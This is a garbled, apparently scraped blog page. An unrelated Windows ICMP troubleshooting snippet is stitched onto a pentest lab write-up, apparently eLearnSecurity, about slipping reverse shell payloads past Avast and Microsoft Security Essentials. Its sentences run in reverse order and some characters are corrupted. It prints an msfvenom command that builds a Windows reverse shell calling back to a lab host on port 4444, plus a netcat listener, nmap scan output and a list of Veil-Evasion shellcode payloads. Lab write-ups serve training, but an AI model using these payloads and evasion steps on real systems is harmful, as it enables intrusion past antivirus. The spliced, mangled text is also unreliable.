![]() Be sure that you've enabled your Windows machines to be able to both send and receive ICMP traffic.Ī faster, but riskier approach to test this is to (temporarily) disable the Windows firewalls to see if it makes any impact. Windows generally has aggressive firewall rules set up, even for ICMP (ping) traffic (both incoming and outgoing). I can't send/receive pings from Windows or macOS If you have additional issues, contact support. We can come back and try others later.This article contains various suggestions and tips to help troubleshoot setup and connectivity issues. Curiously there’s no C++/Java but there’s C#. Scripting languages like Ruby, Python, Powershell, Perl are higher level languages. That would mean C would be preferred here, I’m not familiar with Golang but it appears to be a low level language as well. Now if you had been watching this video linked above, the author explains that the lower-level the language in use, the better it evades AV detection. Now what payload should we choose here? Most of the options look alien, and I couldn’t find a simple reverse shell payload (what are the various shellcode_inject) but the Meterpreter payloads are unmistakable. : | : Available Payloads:Ģ3) powershell/shellcode_inject/psexec_virtual.pyĢ4) powershell/shellcode_inject/virtual.pyĢ9) python/shellcode_inject/aes_encrypt.pyģ0) python/shellcode_inject/arc_encrypt.pyģ1) python/shellcode_inject/base64_substitution.pyģ2) python/shellcode_inject/des_encrypt.pyģ4) python/shellcode_inject/letter_substitution.py We’re looking to evade AV, so choose 1 Veil>: use 1Ĭheckvt Check against generated hashes If you prefer a video you can follow this, but I will be walking through how to use veil evasion below. Be warned, mine took up 830MB of hard drive space and took hours to install because of the numerous required dependencies don’t do it near bedtime (but what is sleep to pentesters anyway?) ![]() You can install it with apt install veil if don’t have it. This time the antivirus catches the payload and prevents it from executing. Ok now let’s turn Avast on and run the same payload. Tunnel adapter Teredo Tunneling Pseudo-Interface: Next we RDP login to host 10 (Avast), disable the AV and see if our normal reverse shell works.Īs expected our nc listener catches the reverse shell payload nc -nlvp 4444Ĭonnect to from (UNKNOWN) 1033Ĭopyright (c) 2009 Microsoft Corporation. No encoder or badchars specified, outputting raw payload Now let’s start with an unencoded msfvenom reverse shell payload 18# msfvenom -a 圆4 -platform Windows -p windows/圆4/shell_reverse_tcp LHOST=172.16.5.50 LPORT=4444 -f exe -o bare_payload.exe Nmap done: 2 IP addresses (2 hosts up) scanned in 83.85 seconds | NetBIOS computer name: VICTIM01-AVAST\x00 Service Info: Host: VICTIM01-AVAST OS: Windows CPE: cpe:/o:microsoft:windows | NetBIOS computer name: VICTIM02-MSE\x00 | OS CPE: cpe:/o:microsoft:windows_7::-:professional ![]() ![]() | OS: Windows 7 Professional 7600 (Windows 7 Professional 6.1) Service Info: Host: VICTIM02-MSE OS: Windows CPE: cpe:/o:microsoft:windows Nmap done: 256 IP addresses (3 hosts up) scanned in 10.00 secondsĪ more detailed OS discovery scan 18# nmap -Pn -n -sV -script=smb-os-discovery.nse 172.16.5.5,10ġ39/tcp open netbios-ssn Microsoft Windows netbios-ssnĤ45/tcp open microsoft-ds Windows 7 Professional 7600 microsoft-ds (workgroup: WORKGROUP)ġ025/tcp open msrpc Microsoft Windows RPCġ026/tcp open msrpc Microsoft Windows RPCġ027/tcp open msrpc Microsoft Windows RPCġ028/tcp open msrpc Microsoft Windows RPCġ029/tcp open msrpc Microsoft Windows RPC Our goal is to generate reverse shell payloads, copy it over to our targets with AV running and get them to execute without the AV catching them. One of them has Avast Antivirus installed, the other has Microsoft Security Essentials. But we are not required to break into either, in fact we are given the admin credentials to log on via RDP. In this lab we are given two boxes as targets. Ok this isn’t within the scope of OSCP, but somehow eLS found it necessary to include it in their labs and I found it interesting anyway, though somewhat divorced from much of their other content.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |